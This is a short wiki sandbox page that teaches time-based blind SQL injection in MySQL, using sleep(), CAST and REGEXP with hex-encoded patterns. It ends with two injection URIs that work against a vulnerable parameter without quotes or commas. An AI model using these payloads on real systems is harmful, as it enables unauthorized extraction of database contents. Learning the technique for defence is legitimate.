Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "User:Mike/Sandbox"

From NetSec
Jump to: navigation, search
(Created page with "===='''Using sleep() to map a table name with regular expressions'''==== {{protip|<i>'''Regular expressions in mysql don't need quotes, it is interchan...")
(No difference)

Revision as of 02:26, 2 May 2012

Using sleep() to map a table name with regular expressions

Protip: Regular expressions in mysql don't need quotes, it is interchangeable with 0xhex!
  mysql> SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0;
  +------------+
  | TABLE_NAME |
  +------------+
  | sample     |
  +------------+
  1 ROW IN SET (0.00 sec)
  • The first letter of "sample" is s, it isn't between a and m, therefore it won't sleep at all when we test to see if it is:
  mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST(
           (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[a-m]')
         AS signed) * 15));
 Empty set (0.00 sec)
  • However, when we test to see if it's between n-z, because s is between n and z the return output from REGEXP is multiplied and becomes 15, which is passed to the sleep() function:
  mysql> SELECT * FROM sample WHERE id=1 AND sleep((SELECT CAST(
           (SELECT (SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0) REGEXP '^[n-z]')
         AS signed) * 15));
 Empty set (15.00 sec)
  • So, an injection URI that utilizes sleep(), cast(), and multiplication can be used remotely in cases of unpredictable output and without the need for quotes, commas, comment notation, or standard comparison operators (<, =, >) to test if the first character of the first table in the database is between a and m would look like:
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e612d6d) as signed) * 15));
  • However the n-z would look like:
/vulnerable.ext?id=1 and sleep((select cast((select (select table_name from information_schema.tables where table_schema=database() limit 1 offset 0) regexp 0x5e6e2d7a) as signed) * 15));